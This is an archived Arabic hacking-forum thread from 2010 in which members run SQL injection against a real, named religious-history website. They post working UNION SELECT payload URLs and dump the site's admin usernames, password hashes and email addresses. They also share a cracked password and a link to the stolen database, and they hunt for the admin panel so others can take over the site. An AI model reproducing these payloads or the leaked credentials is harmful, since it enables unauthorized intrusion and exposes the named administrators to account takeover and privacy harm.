:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)
-   -   موقع مصاب - اصدار قاعدة البيانات 5 (http://www.vbspiders.com/vb/t32683.html)

dz-fox 07-18-2010 05:25 AM

موقع مصاب - اصدار قاعدة البيانات 5
 
[align=center]السلام عليكم

الموقع مجرب و الثغرة ناجحة 100/100 و أنا لم أرد وضع اليوزر و الباسوورد حتى يتدرب عليه المبتدئين

[hide]http://www.bible-history.com/subcat.php?id=-23%20union%20select%20version%28%29[/hide]

بالتوفيق[/align]

superco0ol 07-18-2010 09:10 AM

جاء في وقته


حلو بتعلم عليه


تسلم ايدك..



:)

سربوتن 07-18-2010 10:30 AM

[align=center]الله يبارك فيك [/align]

dz-fox 07-18-2010 02:36 PM

[align=center]شكرا على المرور شباب

ان شاء الله ستكون هناك مواقع جديدة[/align]

Master vbspiders 07-18-2010 04:06 PM

[align=center][/align]بارك الله فيك في ميزان حسناتك باذن الله
تحياتي

Azar36.exe 07-18-2010 04:43 PM

mezyana khoua

Azar36.exe 07-18-2010 04:54 PM

تفضلو يا إخواني :666:
كود PHP:

http://www.bible-history.com/subcat.php?id=-23+union+select+concat(user_name,0x3e,user_pass,0x3e,user_email)+from+bho_board_users-- 


Master vbspiders 07-18-2010 05:27 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة Azar36.exe (المشاركة 174334)
تفضلو يا إخواني :666:
كود PHP:

http://www.bible-history.com/subcat.php?id=-23+union+select+concat(user_name,0x3e,user_pass,0x3e,user_email)+from+bho_board_users-- 



[align=center][/align]حبيبي مشكور بارك الله فيك لكن انا الان جربت حقن الموقع من جديد وطلع معاي معلومات غير شكل

طلع اليوزر : jc
وطلع الباسورد : mos3s



[align=center][/align]انا لو معاي لوحة التحكم كنت جربت ادخل فيه حتى اتاكد اي واحد الصح بس للاسف ما لقيتها..
الي يلقي لوحة التحكم يدخل ويجرب وحلال عليه الموقع ^_^
تحياتي

Azar36.exe 07-18-2010 05:46 PM

أضف الأمر ID لتعرف أيهما الأول

Azar36.exe 07-18-2010 05:48 PM

هذا اليوز الذي إكتشفته يحمل رقم 3 لاكن ماذام الموقع ليس مفتوح التسجيل إذن كلهم من الإذارة
كود PHP:

http://www.bible-history.com/subcat.php?id=-23+union+select+concat(user_id,0x3e,user_name,0x3e,user_pass,0x3e,user_email)+from+bho_board_users-- 


Master vbspiders 07-18-2010 07:08 PM

[align=center][/align]
الان سحبت قاعدة البانات كلها ^_^

وكلامك صحيح ما في اي اعضاء فقط ادارة وهما ثلاثة وعلى الترتيب هيك :
1-admin
2-jc
3-rusty

والباس لكل واحد على الترتيب :

1-a1fba67e72b37d0ba83c2cc937172ec8eb1fda6d
2-b404bbb52c91fe1f291ba9c2719aa7d916dc55e5
3-3a5fbfe524ec4319455769d5462eb2c4ac4cbe79

راح احاول افك التشفير باذن الله...

ايميلاتهم كمان على الترتيب :
1-jim@bible-history.com
2-jim@wanned.com
3-rusty@bible-history.com

عملت سيف لقاعدة البيانات ورفعتها...حملوها وحصلو رابط لوحة التحكم وحلال عليكم الموقع ^_^

لتحميل القاعدة من هنا :
http://www.multiupload.com/QK98XDX9WT






dz-fox 07-18-2010 07:52 PM

[align=center]Master vbspiders
-------------------

بارك الله فيك عزيزي[/align]

darkman.dz 07-18-2010 08:06 PM

جاري التجربة يا ولد البلاد

darkman.dz 07-18-2010 08:15 PM

يا وليد بلادي قولي وعلاه الأمر +from+information_schema+columns
مايمشيش في الموقع ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟
و أنا جربت نزع علامة الزائد و كذلك نفس الخال
http://www.bible-history.com/subcat.php?id=-23 union select version()+from+information_schema+columns

dz-fox 07-18-2010 10:38 PM

[align=center]
اقتباس:

المشاركة الأصلية كتبت بواسطة ooooo_darkman_ooooo (المشاركة 174481)
يا وليد بلادي قولي وعلاه الأمر +from+information_schema+columns
مايمشيش في الموقع ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟
و أنا جربت نزع علامة الزائد و كذلك نفس الخال
http://www.bible-history.com/subcat.php?id=-23 union select version()+from+information_schema+columns

أهلا أخي ... أنظر

ذلك الأمر لا يوضع لوحده

اليك الخطوات ... أفترض أنك تعرف استخراج الاصدار

بعدها ستضيع هذا الأمر في الأخير

from+information_schema.columns+where+column_name+ LIKE+CHAR(37, 112, 97, 115, 37)

و تضع الأمر التالي في مكان أحد الأعمدة المصابة

concat(table_name,0x3a,column_name,0x3a,table_sche ma)

فيصبح الرابط للموقع الذي وضعته أنا كالتالي

http://www.bible-history.com/subcat....20115,%2037%29

سيظهرلك هذا السطر

bho_board_users:user_newpassword:bible_history

و أظن أنك تعرف كيف تكمل

على العموم ان واجهتك مشكلة ضعها هنا[/align]

darkman.dz 07-19-2010 02:54 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة dz-fox (المشاركة 174553)
[align=center]

أهلا أخي ... أنظر

ذلك الأمر لا يوضع لوحده

اليك الخطوات ... أفترض أنك تعرف استخراج الاصدار

بعدها ستضيع هذا الأمر في الأخير

from+information_schema.columns+where+column_name+ LIKE+CHAR(37, 112, 97, 115, 37)

و تضع الأمر التالي في مكان أحد الأعمدة المصابة

concat(table_name,0x3a,column_name,0x3a,table_sche ma)

فيصبح الرابط للموقع الذي وضعته أنا كالتالي

http://www.bible-history.com/subcat....20115,%2037%29

سيظهرلك هذا السطر

bho_board_users:user_newpassword:bible_history

و أظن أنك تعرف كيف تكمل

على العموم ان واجهتك مشكلة ضعها هنا[/align]


ههههههههههههههههههههههههههههههههههههههههه
شوف أخي الموقع إشتغل عادي اليوم
http://www.bible-history.com/subcat....hema.columns--

لا أعلم لماذا لم يشتغل البارحة
أنت لم تفهم قصدي
أنا قصدت أنه عند إضافة الإستعلام
+from+informaion_schema.columns
لازم يشتغل الموقع عادي من دون أخطاء
حتى نعرف أنو الموقع ليس عامل حظر لهذا الإستعلام
حتى نستطيع إكمال الحقن
smilies15

darkman.dz 07-19-2010 03:39 PM

هههههههههههههههههههههههههههههههههههههههههههههههههه ههه
أنا جبت اليوزر و الباس عادي
من دون تشفير
ههههههههههههههههههههههههههههههههههههههههههههههههه
و الحقنة هاهي
user = jc
pass = Mos3s

أرجو أن يستفيد الأعضاء الكرام + شكر خاص لك يا ولد بلادي dz-fox

d4rK-h4ck3r 07-19-2010 03:43 PM

a

darkman.dz 07-19-2010 03:47 PM

هل من أحد خمن لوحة التحكم لنجرب الباس و اليوزر .......

Prince-Of-Hacker 07-20-2010 12:12 PM

مشكووور حبيببي الله يسلم ايدك

عبد الله ر 08-03-2010 02:13 PM

مشكووووووووور
جاري التجريب

عبد الله ر 08-03-2010 02:53 PM

نعم اخي
اليوزر والباس هكذا
اليوزر jc
الباس Mos3s

استطعت الوصول لها من خلال الجدول
administrators:admin_password:bible_history

ولكن عند تستخدام الجدول
bho_board_users:user_newpassword:bible_history

وجدت اسم ادمين اخر وكلمة السر مشفرة تشفير غريب 42 حرف تقريبا

بعد تخمين لوحة الأدارة لقيتها وهي
http://www.bible-history.com/admin1/

بس عند الدخول اليها يظهر خطأ ما بعرف ليش يمكن من المتصفح او شي اخر .....
وهو: Authorization Required

This server could not verify that you are authorized to access the ******** requested. Either you supplied the wrong credentials (e.g., bad password), or your browser doesn't understand how to supply the credentials required.




وهي الحقنة اللي استعملتا ليتعلم منها المبتدئين (وانا منهم) هههه

http://www.bible-history.com/subcat....ministrators--


الله يعطيك العافية
ومشكور

BLACKNIGHT 08-07-2010 11:56 PM

شكرا

KALASH3R 08-10-2010 03:40 PM

يعطيك العافية

بارك الله فيك

amgad noor 08-14-2010 11:31 AM

مشكووووووووووووووووووووووووووووووsmilies11
وووووووووووووووووووووووووووووsmilies11
رررررررررررررررررررررررررررررsmilies11

قناص دمار 08-27-2010 01:08 AM

نتابع

MoJrIm HaCkErS 09-19-2010 09:34 PM

tnx

vip_90 09-23-2010 12:04 PM

thxxxxxxxxxxxxxxxxx

aminyou2310 09-24-2010 07:39 PM

thanksssssssssss

hitlar hacker 12-05-2010 10:52 PM

1111111111111111

salma 12-06-2010 12:35 AM

بارك الله فيك في ميزان حسناتك باذن الله

hmodh 12-06-2010 08:19 PM

ddd

aircrack -ng 12-06-2010 10:13 PM

يعطيك الصحا خو
سبقوني ههههههههههههههه

bosayden 12-06-2010 10:47 PM

مكشور يا أخي

bosayden 12-06-2010 11:32 PM

مسار لوحة التحكم هي
http://www.bible-history.com/admin1/admin.php

أمين المؤمن 12-07-2010 05:24 PM

شكرااااااااا

mr.ghost 12-07-2010 05:33 PM

مشكووووووووووووووووووووووووووووووhttp://www.vbspiders.com/vb/images/s...20%2820%29.gifاخي
بارك الله فيك

mr.ghost 12-07-2010 06:10 PM

بالفعل المسار هو
http://www.bible-history.com/admin1 ولكن غير مصرح بالدخول لازم اي بي معين عشان نجرب الباس واليوزر ولسة هجرب تاني

root4x 12-07-2010 08:31 PM

مشكور و ماقصرت


الساعة الآن 10:06 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0